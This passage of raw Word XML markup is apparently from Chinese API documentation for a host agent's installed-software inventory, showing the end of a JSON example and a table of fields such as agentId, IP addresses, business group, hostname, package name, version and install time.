        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>installTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2017-10-31 21:39:39",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "type": "rpm",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "publisher": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pkgSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "path": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>productVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1879A3"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671"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2445"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3948188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BFF3A1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0964FA20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01DC48B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ADE3299" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5110796F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DE22167" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="072839E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D41D8FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="522E30BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="22C3AFC1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="000F68B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A30588B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BC1AB35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FD1E825" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23E2EEF3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="483A508F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="003168CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="028E34B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="248881A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D799DE8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F5AD91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1310683C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="777B8BC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59AE4428" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F03D50F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DAB8BED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0923B0E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="394580E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A6EFD9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5A16461C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="611191AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A0E1234" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08DD40DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B0E2E63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="15E6EF4B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="238C7837" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EEC99DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35D7A2DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C8F70CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="00ED84BC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5776D807" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="054A5ED6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1124E680" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FAB7D2A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60EAB10F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3309D6EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B86DF2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="202C6C3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63417321" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1AF073B5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26977C8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C91B026" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C1F5881" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79931744" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B757002" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15939EBA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B3D1358" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="511C05A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B1122EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>安装包名</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="32109803" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0356C004" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32111147" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53D090A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03496767" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17FAF4A1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41A46A68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B92F4EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FCAACBF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D51D8E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安装类型（仅Linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="72916086" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11878EBF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>installTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="187BE917" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64A9D791" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62BFC910" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安装时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="67F70136" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E30DC3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="437D9E79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45355608" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A325516" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>总述(仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="09E21A38" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09F654C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>publisher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A1E2550" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="018A468F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30C17CEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
